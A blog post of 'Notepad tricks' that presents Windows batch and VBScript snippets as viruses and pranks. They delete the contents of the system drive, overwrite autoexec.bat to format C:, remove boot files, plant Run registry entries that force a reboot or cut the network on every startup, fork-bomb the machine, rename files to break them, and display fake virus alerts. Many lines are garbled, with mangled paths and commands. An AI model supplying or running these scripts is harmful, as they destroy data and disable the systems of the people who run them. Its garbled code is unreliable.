Few Notepad Tricks [Tricks, Hacks]
All Scripts Here Are To Be Copied In NotePad
Save These Code As Anything.bat
1.This Will Delete All The Content Of A Drive
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2.This Will Just Restart Your Pc
@echo off
shutdown -r -f -t 00
3.This Will Crash Ur Computer (It Only Works With Windows XP )
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell"
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
4.No Idea About The After Effects OF This Virus...
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
5.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* |y
6.This will crash ur computer
: loop
start cmd.exe
goto loop
7.Script that crashes pc
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:
tldr
del c:
tldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER crive
(This Will Pop Up A Message Saying OWNED...)
(And Shut Down The Computer Never To Reboot Again..)
8.Shutdowns Computer Everytime It Is Turned On
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
9.Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
10.Change Files To Non-working TXT Files
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Some more Deadly Tricks...!!!
Trick 1 :
Delete my document :
To delete the my documents folder just 4 fun. Here's what you should do
rmdir C:\Documents and Settings \S\Q
Trick 2 :
Open notepad and type the code below:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning"
Then save it as Virus.VBS
note : this one is not harmful just to scare you...;););)
Trick 3 :
here is the code of a virus
which will open and close your cdrom copy paste code inside equals in notepad
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
save it as virus.vbs and double click it
and if u want to close it just open task manager and end wscript.exe
Trick 4 :
@echo off
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
this will stop your mouse cursor
to fix it log off your pc
Trick 5 :
Note this one is best trick to slow down pc
do
loop
save it as anyname.vbs
and click on it once twice thrice anytime to make pc too slow .
Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager
................................................................................
Eenjoy....(Y)
And feel free to comment...
Eenjoy....(Y)
And feel free to comment...
0 comments:
Post a Comment